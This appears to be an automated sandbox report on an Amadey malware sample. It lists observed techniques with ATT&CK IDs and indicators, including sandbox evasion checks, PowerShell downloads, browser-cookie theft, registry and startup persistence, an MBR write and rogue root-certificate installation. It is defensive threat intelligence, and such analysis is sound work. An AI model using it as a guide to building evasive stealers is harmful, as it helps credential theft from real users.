amadey | 470ff2063dc68be201ec4ac5c81f1339630d6011f05ae1996aab9f282c8aca18

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2a664878e2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b6ef7211da.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	70fa95e2d2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9b345cc369.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	4152	powershell.exe
346	5580	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5868	powershell.exe
5712	powershell.exe
2160	powershell.exe
2556	powershell.exe
1960	powershell.exe
6060	powershell.exe
436	powershell.exe
5960	powershell.exe
996	powershell.exe
5936	powershell.exe
4340	powershell.exe
5580	powershell.exe
6260	powershell.exe
4152	powershell.exe

Downloads MZ/PE file 11 IoCs

flow	pid	Process
269	720	svchost015.exe
328	5588	rapes.exe
32	5588	rapes.exe
32	5588	rapes.exe
32	5588	rapes.exe
32	5588	rapes.exe
32	5588	rapes.exe
32	5588	rapes.exe
32	5588	rapes.exe
15	4152	powershell.exe
99	5588	rapes.exe

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4892	msedge.exe
3436	msedge.exe
5220	chrome.exe
3356	chrome.exe
1564	chrome.exe
1576	chrome.exe
4472	chrome.exe
1544	msedge.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2a664878e2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2a664878e2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b6ef7211da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	70fa95e2d2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9b345cc369.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b6ef7211da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	70fa95e2d2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9b345cc369.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	5uMVCoG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	rapes.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8017cf9.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5uMVCoG.exe	5uMVCoG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5uMVCoG.exe	5uMVCoG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8017cf9.cmd	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
5588	rapes.exe
4440	5uMVCoG.exe
5884	5uMVCoG.exe
5528	mtCxnCB.exe
2240	2a664878e2.exe
720	svchost015.exe
5504	rapes.exe
5928	5uMVCoG.exe
5000	b6ef7211da.exe
940	svchost015.exe
1896	YMauSAr.exe
740	9sWdA2p.exe
5812	javaupdaterw.exe
5936	javaplatform_service.exe
2764	javaservice_update.exe
2528	javapluginw.exe
4244	javaruntime_service.exe
4340	javaruntime.exe
2900	javaservice_platform.exe
3500	70fa95e2d2.exe
6084	javasupport_update.exe
5220	javaruntime_update.exe
3300	javasupport_platform.exe
1448	javaservice_service.exe
4232	javaplatform_platform.exe
3220	javasupport_update.exe
2672	javaupdaterw.exe
4636	javasupport_update.exe
3224	Rm3cVPI.exe
320	javaruntime.exe
552	javaplugin_platform.exe
1484	javaruntime.exe
2104	javaservice_update.exe
5936	javaservice_update.exe
4380	javaplatform_platform.exe
2308	javaruntime_service.exe
2480	javaplugin_service.exe
2108	javaupdater_service.exe
5504	javaupdater_service.exe
3376	javaplatform_platform.exe
3300	javaservicew.exe
4276	javaservice_service.exe
3888	javaplatform.exe
3744	javasupport.exe
5488	javaservice_update.exe
5700	javaruntimew.exe
5664	javapluginw.exe
5604	javaplugin.exe
772	javaupdater_platform.exe
3024	javasupport.exe
3552	javaupdater_update.exe
5472	javaservice_service.exe
6072	javaplugin.exe
756	javaruntime_platform.exe
4188	javaplugin_service.exe
4380	javasupport.exe
988	javaplatform_platform.exe
3228	javaruntime_service.exe
1620	javaupdater_update.exe
4988	javaupdaterw.exe
4480	javasupport_platform.exe
4052	javaservice_platform.exe
3500	javaruntimew.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	2a664878e2.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	b6ef7211da.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	70fa95e2d2.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	9b345cc369.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5uMVCoG = "C:\\Users\\Admin\\AppData\\Roaming\\5uMVCoG.exe"	5uMVCoG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_update.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdater_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdater_service.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdater_platform.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdater_platform.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplatform_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplatform_update.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javasupport_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javasupport_update.exe\""	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
70	ip-api.com
72	ipinfo.io
74	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	9b345cc369.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
7144	tasklist.exe
7752	tasklist.exe
4676	tasklist.exe
7660	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
5588	rapes.exe
2240	2a664878e2.exe
5504	rapes.exe
5000	b6ef7211da.exe
3500	70fa95e2d2.exe
5604	9b345cc369.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2240 set thread context of 720	2240	2a664878e2.exe	115
PID 5000 set thread context of 940	5000	b6ef7211da.exe	126

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3976	6272	WerFault.exe	611
18112	9816	WerFault.exe	621
24348	7112	WerFault.exe	609

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMauSAr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javapluginw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupportw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javapluginw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupportw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b6ef7211da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdaterw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntimew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservicew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdaterw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
18172	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	71	Go-http-client/1.1

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 10 IoCs

Modify Registry

defense_evasion spyware trojan

pid	Process
1796	reg.exe
6064	reg.exe
2996	reg.exe
2040	reg.exe
4676	reg.exe
772	reg.exe
3616	reg.exe
1528	reg.exe
4588	reg.exe
4364	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	YMauSAr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	YMauSAr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	YMauSAr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
452	schtasks.exe
1996	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5580	powershell.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

pid	Process
4152	powershell.exe
4152	powershell.exe
1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
5588	rapes.exe
5588	rapes.exe
5528	mtCxnCB.exe
5528	mtCxnCB.exe
5528	mtCxnCB.exe
5528	mtCxnCB.exe
5528	mtCxnCB.exe
5528	mtCxnCB.exe
2240	2a664878e2.exe
2240	2a664878e2.exe
5504	rapes.exe
5504	rapes.exe
5000	b6ef7211da.exe
5000	b6ef7211da.exe
740	9sWdA2p.exe
740	9sWdA2p.exe
740	9sWdA2p.exe
740	9sWdA2p.exe
740	9sWdA2p.exe
740	9sWdA2p.exe
3500	70fa95e2d2.exe
3500	70fa95e2d2.exe
3500	70fa95e2d2.exe
3500	70fa95e2d2.exe
3500	70fa95e2d2.exe
3500	70fa95e2d2.exe
5960	powershell.exe
5960	powershell.exe
5960	powershell.exe
5868	powershell.exe
5868	powershell.exe
5868	powershell.exe
3224	Rm3cVPI.exe
3224	Rm3cVPI.exe
3224	Rm3cVPI.exe
3224	Rm3cVPI.exe
5580	powershell.exe
5580	powershell.exe
5580	powershell.exe
5936	powershell.exe
5936	powershell.exe
5936	powershell.exe
5712	powershell.exe
5712	powershell.exe
5604	9b345cc369.exe
5604	9b345cc369.exe
5712	powershell.exe
2160	powershell.exe
2160	powershell.exe
2160	powershell.exe
996	powershell.exe
996	powershell.exe
996	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	4440	5uMVCoG.exe
Token: SeDebugPrivilege	5884	5uMVCoG.exe
Token: SeDebugPrivilege	5928	5uMVCoG.exe
Token: SeDebugPrivilege	5960	powershell.exe
Token: SeDebugPrivilege	5868	powershell.exe
Token: SeDebugPrivilege	5580	powershell.exe
